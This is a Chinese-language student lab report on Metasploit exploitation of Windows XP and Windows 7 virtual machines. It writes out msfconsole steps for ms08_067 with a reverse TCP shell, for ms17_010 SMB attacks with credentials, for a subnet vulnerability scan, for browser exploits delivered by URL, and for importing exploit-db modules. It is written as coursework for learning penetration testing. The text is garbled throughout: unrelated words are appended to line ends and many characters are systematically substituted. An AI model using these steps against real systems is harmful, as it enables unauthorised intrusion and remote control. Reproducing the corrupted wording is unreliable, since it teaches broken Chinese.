这个是攻击模块,专门利用漏洞来打通链接的。以前的实验已经作出了后门,可是都须要咱们手动传输到靶机并打开才行,这样的话就须要社会工程学攻击来辅助才能成功,由于别人的电脑不可能那么配合咱们的。这时候就须要exploit模块来帮咱们了,exploit模块能够利用漏洞帮咱们把payload送到靶机。面试
是有效载荷,后面通常加要对靶机进行攻击的代码,包含了各类各样调戏靶机的手段,能够完成对靶机的各类操做,来完成咱们的攻击目的。shell
编码器,对代码进行异或运算、去除坏字符等等,保护payload不被发现。payload明目张胆的过去确定是要被杀的,而encode给payload整个容杀软啥的就认不出payload了,因而payload才能安心干坏事。windows
主机:kali浏览器
靶机:windows xp SP3 english、windows 7 sp1 english安全
其实这边知道xp的ip是192.168.201.129,接着用nmap -PS 192.168.201.128来进行端口扫描,由于下面要用到ms08_067攻击模块进行攻击,因此要确保445端口是打开的,也就是能够ping通。结果发现xp防火墙打开的时候445是默认关闭的,因而把防火墙关掉再扫描能够看见445端口已经打开。这样第一步准备工做就差很少了。网络
在msfconsole下search先找到这个模块而且use该模块tcp
首先应当show targets查看该exploit模块可攻击的对象,不然可能白费功夫,咱们的xp是sp3 english,能够被该模块攻击。工具
接下先设置payload,show payloads能够列出该攻击模块支持的payload。这里选了shell_reverse_tcp做为payload。测试
以后设置一些必要的options,若是不知道设置哪些东西能够先show options查看一下。对这个模块和payload只须要设置设置回连ip和监听ip就可使用了。编码
set RHOST 192.168.201.129 #设置回连ip,即靶机ip set LHOST 192.168.201.128 #设置监听ip
而后exploit,大功告成
先挂上攻击成功的截图
大概的攻击流程以下
set payload xxx #设置payload
set RHOST xxx #设置目标ip
set LHOST xxx #设置监听ip
set smbuser xxx #设置用户名,靶机上的用户
set smbpass xxx #设置登陆密码
exploit
这里用的是ms17_010_psexec模块,ms17_01还有ms17_010_eternalblue版本,当时是由于看到ms17_010_psexec模块比较新因此用它。可是这个模块还须要输入用户名密码来实现攻击,显得不是很好用。而后查了百度说是有些ms17_010_eternalblue模块能够不用输入用户名和密码来攻击,而后本身亲测了如下,从下图看出应该是无法攻击我这个系统,输了帐号密码也不行,看来新版本仍是靠谱一点。
用了这个漏洞感受没想象的那么强大,还要输用户名密码,从另外一个角度看来,平时用电脑啥的多设置一个密码真是好习惯。这个模块提供了一个相似字典暴力破的东西,能够经过管道输入一堆用户名用于测试来打通链接。因此相似“Administrator+空密码”这类用户就得遭殃了。
能想到用这个漏洞是由于在用openvas扫描后发现提示smb漏洞攻击成功率很高,因此去msfconsole里面search了一下就找到了。原本这个漏洞是但愿拿来攻击win10的,不过不行,target提示错误了。因而又拿去win7试了一下打通了。
openvas的安装和使用老师的文档里讲的很清楚,这里不做赘述。
若是要更好的利用这个漏洞,能够利用smb_ms17_010辅助模块来扫描能够攻击的ip,这个辅助模块在必定程度上弥补了须要用户名密码的缺陷。
use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.201.0/24 #扫描192.168.201.0-192.168.201.255的ip run
这个模块是经过search browser随便找出的一个,以前试了好几个都很差用。还在exploit-db上下载了一个比较新的,由于是适用火狐44.0.2的,还特地下了,结果搞了半天出不告终果。
这些模块用起来都差很少:
set SRVHOST xxx #本身的ip
set payload xxx #选一个合适的payload
set LHOST xxx #本身的ip
exploit
和前面的主动攻击不一样的是须要在靶机上访问生成的url,如上图所示,这个url能够本身设置。而后在xp系统中打开ie,输入url访问,在kali的msfconsole下就能够看到结果了,以下图。
这个漏洞targets里面说能够攻击xp和win 7,不过亲测只有xp能通。
在windows/fileformat下面翻了很久找到这么一个好用的模块,也是为了知足试验要求。
看这个模块的options能够发现参数都有默认配置,其实直接就能够用,要改也只须要改一下SRVHOST就能够。
而后在win7上访问下图中的url测试,渗透成功。
show options就能够知道应该配置哪些选项
首先在exploit-db上找到本身须要的模块并下载,通常只有标有meterpreter下下来才是能够导入的.rb文件。找到meterpreter的module的路径,只须要把.rb文件放到module里面而后msfconsole从新导入就能够了,不过最好能够新建一个文件夹专门放本身的module。
拷贝进去以后打开msfconsle,
msf> reload_all
结束后能够use测试一下。
此次实验刚开始有点不知从何下手,听老师说的去exploit-db上找个攻击win10的模块,不装xp。结果忙活了大半天试了几个啥反应都没有,最后仍是放弃win10转战win7和xp。
我先是下了一个Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit),操做感受都ok,但是到最后win10浏览器打开连接出现几个提示就没反应了。后面又试了一个针对firefox浏览器44.0.2版本的攻击,按它说明是windows平台点开连接浏览器会崩并打开calc.exe,然而我本身试确实浏览器崩了啥反应没有。。。
而后我就装了xp照着实验指导用ms08_067模块试了一下,没几下就搞定了。对比以前最大的感觉就是这些meterpreter装好的模块的说明很详细,基本上随便一个模块show targets + show options +show payloads就能够直接用了,不行再打开.rb文件里面看注释也挺详细的。但是exploit-db上的帮助和targets啥的根本看不出什么东西,出错了报错也不完善,估计是别人刚开发就传上去了,对新手太不友好了。
xp成功后我又开始对win10有想法了,而后利用端口扫描看打开的端口。针对这几个端口我又测试了几个模块,依然gg,但是又以为xp如今的使用率已经很低了,因而装了个win7开搞。
而后用以前对win10用过的模块在win7上面试了一下,结果就成功了,看来仍是要跟着时代走,该更新仍是要更新。
我以为此次实验其实难点根本就再也不攻击模块的使用,可否用好辅助模块反而更关键。若是把辅助模块用好了,就能少走不少弯路,避免不少没必要要的工做。还有漏洞扫描工具openvas我是作了一半才去使用它的,如今看来第一步就应该拿这个扫一遍,应该拿什么模块攻击search一下全出来了。
作了此次实验感受要实现局域网内的攻击是比较容易的,听了老师对网络通讯的一个介绍后,感受要黑外网的电脑太难了,除非能把各个网关都黑掉,基本只能钓鱼等着用户本身去点。反过来看只要咱们不点不良连接,提升网络安全意识,要被黑客给黑到真的是很难的。同时应该注意到局域网的安全性不是那么有保障,应该少连一些路边wifi,省得啥时候被黑了都不知道,还有就是操做系统的更新、漏洞的修复真的有用啊,我要是不更新win10,能是下面这个结果吗(192.168.201.1就是个人win10),win7都不用下了。